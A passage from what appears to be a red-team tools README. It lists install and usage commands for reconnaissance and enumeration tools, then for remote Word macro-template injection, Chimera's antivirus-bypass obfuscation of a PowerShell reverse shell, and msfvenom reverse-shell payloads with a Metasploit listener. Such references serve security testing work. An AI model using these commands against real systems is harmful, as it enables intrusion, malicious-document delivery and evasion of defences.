class="pl-c">#</span> Scan 192.168.1.1 subnet</span> ./dismap -i 192.168.1.1/24 <span class="pl-c"><span class="pl-c">#</span> Scan, output to result.txt and json output to result.json</span> ./dismap -i 192.168.1.1/24 -o result.txt -j result.json <span class="pl-c"><span class="pl-c">#</span> Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds</span> ./dismap -i 192.168.1.1/24 --np --timeout 10 <span class="pl-c"><span class="pl-c">#</span> Scan, Number of concurrent threads 1000</span> ./dismap -i 192.168.1.1/24 -t 1000</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210266012-ba3fadf8-5021-4690-a6d7-eda78bd5d50a.png"><img src="https://user-images.githubusercontent.com/100603074/210266012-ba3fadf8-5021-4690-a6d7-eda78bd5d50a.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/zhzyker/dismap">https://github.com/zhzyker/dismap</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/CiscoCXSecurity/enum4linux">enum4linux</a></h3><a id="user-content-enum4linux" class="anchor" aria-label="Permalink: 🔙enum4linux" href="#enum4linux"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A 
tool for enumerating information from Windows and Samba systems.</p> <p dir="auto">It can be used to gather a wide range of information, including:</p> <ul dir="auto"> <li>Domain and domain controller information</li> <li>Local user and group information</li> <li>Shares and share permissions</li> <li>Security policies</li> <li>Active Directory information</li> </ul> <p dir="auto"><strong>Install: (Apt)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt install enum4linux"><pre>sudo apt install enum4linux</pre></div> <p dir="auto"><strong>Install: (Git)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/CiscoCXSecurity/enum4linux cd enum4linux"><pre>git clone https://github.com/CiscoCXSecurity/enum4linux <span class="pl-c1">cd</span> enum4linux</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# 'Do everything' enum4linux.pl -a 192.168.2.55 # Obtain list of usernames (RestrictAnonymous = 0) enum4linux.pl -U 192.168.2.55 # Obtain list of usernames (using authentication) enum4linux.pl -u administrator -p password -U 192.168.2.55 # Get a list of groups and their members enum4linux.pl -G 192.168.2.55 # Verbose scan enum4linux.pl -v 192.168.2.55"><pre><span class="pl-c"><span class="pl-c">#</span> 'Do everything'</span> enum4linux.pl -a 192.168.2.55 <span class="pl-c"><span class="pl-c">#</span> Obtain list of usernames (RestrictAnonymous = 0)</span> enum4linux.pl -U 192.168.2.55 <span class="pl-c"><span class="pl-c">#</span> Obtain list of usernames (using authentication)</span> enum4linux.pl -u administrator -p password -U 192.168.2.55 <span class="pl-c"><span class="pl-c">#</span> Get a list of 
groups and their members</span> enum4linux.pl -G 192.168.2.55 <span class="pl-c"><span class="pl-c">#</span> Verbose scan </span> enum4linux.pl -v 192.168.2.55</pre></div> <p dir="auto">Full usage information can be found in this <a href="https://labs.portcullis.co.uk/tools/enum4linux/" rel="nofollow">blog</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210266058-bf05f272-ff05-4e97-97e9-5d11b7ae01eb.png"><img src="https://user-images.githubusercontent.com/100603074/210266058-bf05f272-ff05-4e97-97e9-5d11b7ae01eb.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/" rel="nofollow">https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/Esc4iCEscEsc/skanuvaty">skanuvaty</a></h3><a id="user-content-skanuvaty" class="anchor" aria-label="Permalink: 🔙skanuvaty" href="#skanuvaty"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Dangerously fast dns/network/port scanner, created by <a href="https://github.com/Esc4iCEscEsc">Esc4iCEscEsc</a>, written in 
rust.</p> <p dir="auto">You will need a subdomains file. <em>E.g. <a href="https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt" rel="nofollow">Subdomain wordlist by Sublist3r</a></em>.</p> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">Download the latest release from <a href="https://github.com/Esc4iCEscEsc/skanuvaty/releases">here</a>.</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Install a wordlist sudo apt install wordlists ls /usr/share/dirb/wordlists ls /usr/share/amass/wordlists"><pre><span class="pl-c"><span class="pl-c">#</span> Install a wordlist</span> sudo apt install wordlists ls /usr/share/dirb/wordlists ls /usr/share/amass/wordlists</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt"><pre>skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210856146-42a4015c-f34b-4dc6-9e9b-cbeb4a43a964.png"><img src="https://user-images.githubusercontent.com/100603074/210856146-42a4015c-f34b-4dc6-9e9b-cbeb4a43a964.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/Esc4iCEscEsc/skanuvaty">https://github.com/Esc4iCEscEsc/skanuvaty</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/j3ssie/metabigor">Metabigor</a></h3><a id="user-content-metabigor" class="anchor" aria-label="Permalink: 🔙Metabigor" href="#metabigor"><svg class="octicon octicon-link" viewBox="0 0 16 16" 
version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Metabigor is an intelligence tool; its goal is to perform OSINT tasks and more without needing any API key.</p> <p dir="auto"><strong>Main Features:</strong></p> <ul dir="auto"> <li>Searching for information about an IP address, ASN, and organization.</li> <li>Wrapper for running rustscan, masscan, and nmap more efficiently on an IP/CIDR.</li> <li>Finding more related domains of the target by applying various techniques (certificate, whois, Google Analytics, etc.).</li> <li>Get a summary of an IP address (powered by <a href="https://github.com/theblackturtle">@thebl4ckturtle</a>)</li> </ul> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="go install github.com/j3ssie/metabigor@latest"><pre>go install github.com/j3ssie/metabigor@latest</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# discovery IP of a company/organization echo &quot;company&quot; | metabigor net --org -o /tmp/result.txt # Getting more related domains by searching for certificate info echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command # Only run rustscan with full ports echo '1.2.3.4/24' | 
metabigor scan -o result.txt # Reverse Whois to find related domains echo 'example.com' | metabigor related -s 'whois' # Get Google Analytics ID directly from the URL echo 'https://example.com' | metabigor related -s 'google-analytic'"><pre><span class="pl-c"><span class="pl-c">#</span> discovery IP of a company/organization</span> <span class="pl-c1">echo</span> <span class="pl-s"><span class="pl-pds">"</span>company<span class="pl-pds">"</span></span> <span class="pl-k">|</span> metabigor net --org -o /tmp/result.txt <span class="pl-c"><span class="pl-c">#</span> Getting more related domains by searching for certificate info</span> <span class="pl-c1">echo</span> <span class="pl-s"><span class="pl-pds">'</span>Target Inc<span class="pl-pds">'</span></span> <span class="pl-k">|</span> metabigor cert --json <span class="pl-k">|</span> jq -r <span class="pl-s"><span class="pl-pds">'</span>.Domain<span class="pl-pds">'</span></span> <span class="pl-k">|</span> unfurl format %r.%t <span class="pl-k">|</span> sort -u <span class="pl-c"><span class="pl-c">#</span> this is old command</span> <span class="pl-c"><span class="pl-c">#</span> Only run rustscan with full ports</span> <span class="pl-c1">echo</span> <span class="pl-s"><span class="pl-pds">'</span>1.2.3.4/24<span class="pl-pds">'</span></span> <span class="pl-k">|</span> metabigor scan -o result.txt <span class="pl-c"><span class="pl-c">#</span> Reverse Whois to find related domains</span> <span class="pl-c1">echo</span> <span class="pl-s"><span class="pl-pds">'</span>example.com<span class="pl-pds">'</span></span> <span class="pl-k">|</span> metabigor related -s <span class="pl-s"><span class="pl-pds">'</span>whois<span class="pl-pds">'</span></span> <span class="pl-c"><span class="pl-c">#</span> Get Google Analytics ID directly from the URL</span> <span class="pl-c1">echo</span> <span class="pl-s"><span class="pl-pds">'</span>https://example.com<span class="pl-pds">'</span></span> <span class="pl-k">|</span> 
metabigor related -s <span class="pl-s"><span class="pl-pds">'</span>google-analytic<span class="pl-pds">'</span></span></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210982590-44d58bfc-3b1b-4e11-b8f3-58c5a517626d.png"><img src="https://user-images.githubusercontent.com/100603074/210982590-44d58bfc-3b1b-4e11-b8f3-58c5a517626d.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/j3ssie/metabigor">https://github.com/j3ssie/metabigor</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/michenriksen/gitrob">Gitrob</a></h3><a id="user-content-gitrob" class="anchor" aria-label="Permalink: 🔙Gitrob" href="#gitrob"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github.</p> <p dir="auto">Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.</p> <p dir="auto">The findings will be presented through a web interface for easy browsing and analysis.</p> <p 
dir="auto"><strong>Note:</strong> <em>Gitrob will need a Github access token in order to interact with the Github API. <a href="https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/">Create a personal access token</a> and save it in an environment variable in your .bashrc or similar shell configuration file:</em></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef"><pre><span class="pl-k">export</span> GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef</pre></div> <p dir="auto"><strong>Install: (Go)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="go get github.com/michenriksen/gitrob"><pre>go get github.com/michenriksen/gitrob</pre></div> <p dir="auto"><strong>Install: (Binary)</strong></p> <p dir="auto">A <a href="https://github.com/michenriksen/gitrob/releases">precompiled version</a> is available for each release.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Run against org gitrob {org_name} # Saving session to a file gitrob -save ~/gitrob-session.json acmecorp # Loading session from a file gitrob -load ~/gitrob-session.json"><pre><span class="pl-c"><span class="pl-c">#</span> Run against org</span> gitrob {org_name} <span class="pl-c"><span class="pl-c">#</span> Saving session to a file</span> gitrob -save <span class="pl-k">~</span>/gitrob-session.json acmecorp <span class="pl-c"><span class="pl-c">#</span> Loading session from a file</span> gitrob -load <span class="pl-k">~</span>/gitrob-session.json</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" 
href="https://user-images.githubusercontent.com/100603074/210982754-fb70db8f-0e0f-4c31-962f-ac89edc7e64a.png"><img src="https://user-images.githubusercontent.com/100603074/210982754-fb70db8f-0e0f-4c31-962f-ac89edc7e64a.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.uedbox.com/post/58828/" rel="nofollow">https://www.uedbox.com/post/58828/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/sensepost/gowitness">gowitness</a></h3><a id="user-content-gowitness" class="anchor" aria-label="Permalink: 🔙gowitness" href="#gowitness"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Gowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line, with a handy report viewer to process results. 
Both Linux and macOS are supported, with Windows support mostly working.</p> <p dir="auto"><strong>Install: (Go)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="go install github.com/sensepost/gowitness@latest"><pre>go install github.com/sensepost/gowitness@latest</pre></div> <p dir="auto">Full installation information can be found <a href="https://github.com/sensepost/gowitness/wiki/Installation">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Screenshot a single website gowitness single https://www.google.com/ # Screenshot a cidr using 20 threads gowitness scan --cidr 192.168.0.0/24 --threads 20 # Screenshot open http services from an nmap file gowitness nmap -f nmap.xml --open --service-contains http # Run the report server gowitness report serve"><pre><span class="pl-c"><span class="pl-c">#</span> Screenshot a single website</span> gowitness single https://www.google.com/ <span class="pl-c"><span class="pl-c">#</span> Screenshot a cidr using 20 threads</span> gowitness scan --cidr 192.168.0.0/24 --threads 20 <span class="pl-c"><span class="pl-c">#</span> Screenshot open http services from an nmap file</span> gowitness nmap -f nmap.xml --open --service-contains http <span class="pl-c"><span class="pl-c">#</span> Run the report server</span> gowitness report serve</pre></div> <p dir="auto">Full usage information can be found <a href="https://github.com/sensepost/gowitness/wiki/Usage">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/212204666-d7dcac1b-0f1a-46b8-8938-d2e122c1436c.png"><img src="https://user-images.githubusercontent.com/100603074/212204666-d7dcac1b-0f1a-46b8-8938-d2e122c1436c.png" alt="image" style="max-width: 
100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/sensepost/gowitness">https://github.com/sensepost/gowitness</a></em></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Resource Development</h1><a id="user-content-resource-development" class="anchor" aria-label="Permalink: Resource Development" href="#resource-development"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/JohnWoodman/remoteinjector">remoteInjector</a></h3><a id="user-content-remoteinjector" class="anchor" aria-label="Permalink: 🔙remoteInjector" href="#remoteinjector"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 
2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Injects a link to a remote Word template into a Word document.</p> <p dir="auto">This Python-based utility modifies a .docx file’s settings.xml.rels link so that it points at a remotely hosted .dotm template containing a VBA macro, which executes when the document is opened and macros are enabled.</p> <p dir="auto"><a href="https://john-woodman.com/research/vba-macro-remote-template-injection/" rel="nofollow">Related Blog Post</a></p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/JohnWoodman/remoteinjector;cd remoteinjector"><pre>git clone https://github.com/JohnWoodman/remoteinjector<span class="pl-k">;</span><span class="pl-c1">cd</span> remoteinjector</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 remoteinjector.py -w https://example.com/template.dotm example.docx"><pre>python3 remoteinjector.py -w https://example.com/template.dotm example.docx</pre></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/tokyoneon/Chimera">Chimera</a></h3><a id="user-content-chimera" class="anchor" aria-label="Permalink: 🔙Chimera" href="#chimera"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 
1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Chimera is a PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ sudo chmod +x chimera.sh; ./chimera.sh --help"><pre>sudo apt-get update <span class="pl-k">&&</span> sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown <span class="pl-smi">$USER</span>:<span class="pl-smi">$USER</span> -R /opt/chimera/<span class="pl-k">;</span> <span class="pl-c1">cd</span> /opt/chimera/ sudo chmod +x chimera.sh<span class="pl-k">;</span> ./chimera.sh --help</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\ copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\ invoke-expression,out-string,write-error -j -g -k -r -p"><pre>./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\ copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\ invoke-expression,out-string,write-error 
-j -g -k -r -p</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/209867736-5c35cec0-9227-4f18-a439-a5c954342818.png"><img src="https://user-images.githubusercontent.com/100603074/209867736-5c35cec0-9227-4f18-a439-a5c954342818.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://www.offensive-security.com/metasploit-unleashed/Msfvenom/" rel="nofollow">msfvenom</a></h3><a id="user-content-msfvenom" class="anchor" aria-label="Permalink: 🔙msfvenom" href="#msfvenom"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Msfvenom allows the creation of payloads for various operating systems in a wide range of formats. 
It also supports obfuscation of payloads for AV bypass.</p> <p dir="auto"><strong>Set Up Listener</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run"><pre>use exploit/multi/handler <span class="pl-c1">set</span> PAYLOAD windows/meterpreter/reverse_tcp <span class="pl-c1">set</span> LHOST your-ip <span class="pl-c1">set</span> LPORT listening-port run</pre></div> <div class="markdown-heading" dir="auto"><h4 tabindex="-1" class="heading-element" dir="auto">Msfvenom Commands</h4><a id="user-content-msfvenom-commands" class="anchor" aria-label="Permalink: Msfvenom Commands" href="#msfvenom-commands"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><strong>PHP:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R"><pre>msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R</pre></div> <p dir="auto"><strong>Windows:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" 
